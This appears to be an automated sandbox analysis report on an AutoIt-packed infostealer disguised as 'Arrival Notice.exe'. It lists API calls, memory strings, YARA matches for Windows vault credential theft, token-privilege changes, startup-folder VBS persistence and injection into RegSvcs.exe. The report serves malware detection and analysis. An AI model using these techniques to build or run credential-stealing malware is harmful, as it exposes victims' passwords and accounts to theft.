                    Source: C:\Users\user\Desktop\Arrival Notice.exeCode function: 0_2_0094425A OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_0094425A
                    Source: C:\Users\user\Desktop\Arrival Notice.exeCode function: 0_2_00930219 GetKeyboardState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,0_2_00930219
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                    Source: C:\Users\user\Desktop\Arrival Notice.exeCode function: 0_2_0095CDAC DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_0095CDAC
                    Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 2_2_0023CDAC DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,2_2_0023CDAC

                    System Summary

                    barindex
                    Source: 3.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 5.2.name.exe.3950000.1.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 2.2.name.exe.15d0000.1.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 5.2.name.exe.3950000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 2.2.name.exe.15d0000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 00000002.00000002.2086913169.00000000015D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 00000005.00000002.2225248989.0000000003950000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: C:\Users\user\Desktop\Arrival Notice.exeCode function: This is a third-party compiled AutoIt script.0_2_008D3B4C
                    Source: Arrival Notice.exeString found in binary or memory: This is a third-party compiled AutoIt script.
                    Source: Arrival Notice.exe, 00000000.00000003.2074284725.0000000003DD5000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_9f6fbcef-7
                    Source: Arrival Notice.exe, 00000000.00000003.2074284725.0000000003DD5000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_7a8b5c90-1
                    Source: Arrival Notice.exe, 00000000.00000000.2066511555.0000000000985000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_68eac7e2-d
                    Source: Arrival Notice.exe, 00000000.00000000.2066511555.0000000000985000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_c375677a-6
                    Source: C:\Users\user\AppData\Local\directory\name.exeCode function: This is a third-party compiled AutoIt script.2_2_001B3B4C
                    Source: name.exeString found in binary or memory: This is a third-party compiled AutoIt script.
                    Source: name.exe, 00000002.00000002.2086394620.0000000000265000.00000002.00000001.01000000.00000004.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_9f8b0b23-9
                    Source: name.exe, 00000002.00000002.2086394620.0000000000265000.00000002.00000001.01000000.00000004.sdmpString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_e94843a6-5
                    Source: name.exe, 00000005.00000000.2210786318.0000000000265000.00000002.00000001.01000000.00000004.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_d4b95cee-4
                    Source: name.exe, 00000005.00000000.2210786318.0000000000265000.00000002.00000001.01000000.00000004.sdmpString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_e5dcb13e-b
                    Source: Arrival Notice.exeString found in binary or memory: This is a third-party compiled AutoIt script.memstr_bd9cb714-7
                    Source: Arrival Notice.exeString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_9ba94f04-1
                    Source: name.exe.0.drString found in binary or memory: This is a third-party compiled AutoIt script.memstr_d62dc2ff-2
                    Source: name.exe.0.drString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_241a4ee9-4
                    Source: initial sampleStatic PE information: Filename: Arrival Notice.exe
                    Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
                    Source: C:\Users\user\Desktop\Arrival Notice.exeCode function: 0_2_009340B1: CreateFileW,_memset,DeviceIoControl,CloseHandle,0_2_009340B1
                    Source: C:\Users\user\Desktop\Arrival Notice.exeCode function: 0_2_00928858 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,0_2_00928858
                    Source: C:\Users\user\Desktop\Arrival Notice.exeCode function: 0_2_0093545F ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,0_2_0093545F
                    Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 2_2_0021545F ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,2_2_0021545F
                    Source: C:\Users\user\Desktop\Arrival Notice.exeCode function: 0_2_008DE8000_2_008DE800
                    Source: C:\Users\user\Desktop\Arrival Notice.exeCode function: 0_2_008FDBB50_2_008FDBB5
                    Source: C:\Users\user\Desktop\Arrival Notice.exeCode function: 0_2_0095804A0_2_0095804A
                    Source: C:\Users\user\Desktop\Arrival Notice.exeCode function: 0_2_008DE0600_2_008DE060
                    Source: C:\Users\user\Desktop\Arrival Notice.exeCode function: 0_2_008E41400_2_008E4140
                    Source: C:\Users\user\Desktop\Arrival Notice.exeCode function: 0_2_008F24050_2_008F2405
                    Source: C:\Users\user\Desktop\Arrival Notice.exeCode function: 0_2_009065220_2_00906522
                    Source: C:\Users\user\Desktop\Arrival Notice.exeCode function: 0_2_0090267E0_2_0090267E
                    Source: C:\Users\user\Desktop\Arrival Notice.exeCode function: 0_2_009506650_2_00950665
                    Source: C:\Users\user\Desktop\Arrival Notice.exeCode function: 0_2_008F283A0_2_008F283A
                    Source: C:\Users\user\Desktop\Arrival Notice.exeCode function: 0_2_008E68430_2_008E6843
                    Source: C:\Users\user\Desktop\Arrival Notice.exeCode function: 0_2_009089DF0_2_009089DF
                    Source: C:\Users\user\Desktop\Arrival Notice.exeCode function: 0_2_00906A940_2_00906A94
                    Source: C:\Users\user\Desktop\Arrival Notice.exeCode function: 0_2_00950AE20_2_00950AE2
                    Source: C:\Users\user\Desktop\Arrival Notice.exeCode function: 0_2_008E8A0E0_2_008E8A0E
                    Source: C:\Users\user\Desktop\Arrival Notice.exeCode function: 0_2_00938B130_2_00938B13
                    Source: C:\Users\user\Desktop\Arrival Notice.exeCode function: 0_2_0092EB070_2_0092EB07
                    Source: C:\Users\user\Desktop\Arrival Notice.exeCode function: 0_2_008FCD610_2_008FCD61
                    Source: C:\Users\user\Desktop\Arrival Notice.exeCode function: 0_2_009070060_2_00907006
                    Source: C:\Users\user\Desktop\Arrival Notice.exeCode function: 0_2_008E31900_2_008E3190
                    Source: C:\Users\user\Desktop\Arrival Notice.exeCode function: 0_2_008E710E0_2_008E710E
                    Source: C:\Users\user\Desktop\Arrival Notice.exeCode function: 0_2_008D12870_2_008D1287
                    Source: C:\Users\user\Desktop\Arrival Notice.exeCode function: 0_2_008F33C70_2_008F33C7
                    Source: C:\Users\user\Desktop\Arrival Notice.exeCode function: 0_2_008FF4190_2_008FF419
                    Source: C:\Users\user\Desktop\Arrival Notice.exeCode function: 0_2_008E56800_2_008E5680
                    Source: C:\Users\user\Desktop\Arrival Notice.exeCode function: 0_2_008F16C40_2_008F16C4
                    Source: C:\Users\user\Desktop\Arrival Notice.exeCode function: 0_2_008E58C00_2_008E58C0
                    Source: C:\Users\user\Desktop\Arrival Notice.exeCode function: 0_2_008F78D30_2_008F78D3
                    Source: C:\Users\user\Desktop\Arrival Notice.exeCode function: 0_2_008F1BB80_2_008F1BB8
                    Source: C:\Users\user\Desktop\Arrival Notice.exeCode function: 0_2_00909D050_2_00909D05
                    Source: C:\Users\user\Desktop\Arrival Notice.exeCode function: 0_2_008DFE400_2_008DFE40
                    Source: C:\Users\user\Desktop\Arrival Notice.exeCode function: 0_2_008F1FD00_2_008F1FD0
                    Source: C:\Users\user\Desktop\Arrival Notice.exeCode function: 0_2_008FBFE60_2_008FBFE6
                    Source: C:\Users\user\Desktop\Arrival Notice.exeCode function: 0_2_014C36100_2_014C3610
                    Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 2_2_001BE8002_2_001BE800
                    Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 2_2_001DDBB52_2_001DDBB5
                    Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 2_2_0023804A2_2_0023804A
                    Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 2_2_001BE0602_2_001BE060
                    Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 2_2_001C41402_2_001C4140
                    Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 2_2_001D24052_2_001D2405
                    Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 2_2_001E65222_2_001E6522
                    Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 2_2_002306652_2_00230665
                    Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 2_2_001E267E2_2_001E267E
                    Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 2_2_001D283A2_2_001D283A
                    Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 2_2_001C68432_2_001C6843
                    Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 2_2_001E89DF2_2_001E89DF
                    Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 2_2_001C8A0E2_2_001C8A0E
                    Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 2_2_001E6A942_2_001E6A94
                    Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 2_2_00230AE22_2_00230AE2
                    Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 2_2_0020EB072_2_0020EB07
                    Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 2_2_00218B132_2_00218B13
                    Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 2_2_001DCD612_2_001DCD61
                    Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 2_2_001E70062_2_001E7006
                    Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 2_2_001C710E2_2_001C710E
                    Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 2_2_001C31902_2_001C3190
                    Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 2_2_001B12872_2_001B1287
                    Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 2_2_001D33C72_2_001D33C7
                    Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 2_2_001DF4192_2_001DF419
                    Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 2_2_001C56802_2_001C5680
                    Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 2_2_001D16C42_2_001D16C4
                    Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 2_2_001D78D32_2_001D78D3
                    Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 2_2_001C58C02_2_001C58C0
                    Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 2_2_001D1BB82_2_001D1BB8
                    Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 2_2_001E9D052_2_001E9D05
                    Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 2_2_001BFE402_2_001BFE40
                    Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 2_2_001D1FD02_2_001D1FD0
                    Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 2_2_001DBFE62_2_001DBFE6
                    Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 2_2_015B36102_2_015B3610
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0106A1B83_2_0106A1B8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0106E2C83_2_0106E2C8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0106AA403_2_0106AA40
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_01064AA03_2_01064AA0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0106DCD83_2_0106DCD8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_01063E883_2_01063E88
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_010641D03_2_010641D0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_06727D583_2_06727D58
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_067265D03_2_067265D0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_067255883_2_06725588
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0672B2103_2_0672B210
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_067223483_2_06722348
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0672C1583_2_0672C158
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_067276783_2_06727678
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_06725CD03_2_06725CD0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0672E3803_2_0672E380
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_067200403_2_06720040
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_067200073_2_06720007
                    Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 5_2_021736105_2_02173610
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00CB41D06_2_00CB41D0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00CBA1B86_2_00CBA1B8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00CBE6C86_2_00CBE6C8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00CB4AA06_2_00CB4AA0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00CBAA406_2_00CBAA40
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00CB3E886_2_00CB3E88
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_061D55886_2_061D5588
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_061D65D06_2_061D65D0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_061DB2106_2_061DB210
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_061D23486_2_061D2348
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_061DC1586_2_061DC158
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_061D7D586_2_061D7D58
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_061D76786_2_061D7678
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_061DE3806_2_061DE380
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_061D00406_2_061D0040
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_061D5CD06_2_061D5CD0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_061D00066_2_061D0006
                    Source: C:\Users\user\AppData\Local\directory\name.exeCode function: String function: 001D8B40 appears 42 times
                    Source: C:\Users\user\AppData\Local\directory\name.exeCode function: String function: 001D0D27 appears 70 times
                    Source: C:\Users\user\AppData\Local\directory\name.exeCode function: String function: 001B7F41 appears 35 times
                    Source: C:\Users\user\Desktop\Arrival Notice.exeCode function: String function: 008D7F41 appears 35 times
                    Source: C:\Users\user\Desktop\Arrival Notice.exeCode function: String function: 008F0D27 appears 70 times
                    Source: C:\Users\user\Desktop\Arrival Notice.exeCode function: String function: 008F8B40 appears 42 times
                    Source: Arrival Notice.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                    Source: 3.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 5.2.name.exe.3950000.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 2.2.name.exe.15d0000.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 5.2.name.exe.3950000.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 2.2.name.exe.15d0000.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 00000002.00000002.2086913169.00000000015D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 00000005.00000002.2225248989.0000000003950000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 2.2.name.exe.15d0000.1.raw.unpack, slKb.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 2.2.name.exe.15d0000.1.raw.unpack, mAKJ.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 2.2.name.exe.15d0000.1.raw.unpack, xQRSe0Fg.csCryptographic APIs: 'CreateDecryptor', 'TransformBlock'
                    Source: 2.2.name.exe.15d0000.1.raw.unpack, n3rhMa.csCryptographic APIs: 'CreateDecryptor'
                    Source: 2.2.name.exe.15d0000.1.raw.unpack, MQzE4FWn.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 2.2.name.exe.15d0000.1.raw.unpack, nSmgRyX5a1.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 2.2.name.exe.15d0000.1.raw.unpack, 6IMLmJtk.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 2.2.name.exe.15d0000.1.raw.unpack, 6IMLmJtk.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                    Source: 2.2.name.exe.15d0000.1.raw.unpack, 3HroK7qN.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 2.2.name.exe.15d0000.1.raw.unpack, 3HroK7qN.csCryptographic APIs: 'TransformFinalBlock'
                    Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winEXE@10/10@2/2
                    Source: C:\Users\user\Desktop\Arrival Notice.exeCode function: 0_2_0093A2D5 GetLastError,FormatMessageW,0_2_0093A2D5
                    Source: C:\Users\user\Desktop\Arrival Notice.exeCode function: 0_2_00928713 AdjustTokenPrivileges,CloseHandle,0_2_00928713
                    Source: C:\Users\user\Desktop\Arrival Notice.exeCode function: 0_2_00928CC3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,0_2_00928CC3
                    Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 2_2_00208713 AdjustTokenPrivileges,CloseHandle,2_2_00208713
                    Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 2_2_00208CC3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,2_2_00208CC3
                    Source: C:\Users\user\Desktop\Arrival Notice.exeCode function: 0_2_0093B59E SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,0_2_0093B59E
                    Source: C:\Users\user\Desktop\Arrival Notice.exeCode function: 0_2_0094F121 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,0_2_0094F121
                    Source: C:\Users\user\Desktop\Arrival Notice.exeCode function: 0_2_009486D0 CoInitialize,CoUninitialize,CoCreateInstance,IIDFromString,VariantInit,VariantClear,0_2_009486D0
                    Source: C:\Users\user\Desktop\Arrival Notice.exeCode function: 0_2_008D4FE9 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,0_2_008D4FE9
                    Source: C:\Users\user\Desktop\Arrival Notice.exeFile created: C:\Users\user\AppData\Local\directoryJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeMutant created: NULL
                    Source: C:\Users\user\Desktop\Arrival Notice.exeFile created: C:\Users\user\AppData\Local\Temp\autA3B6.tmpJump to behavior
                    Source: unknownProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\name.vbs"
                    Source: Arrival Notice.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
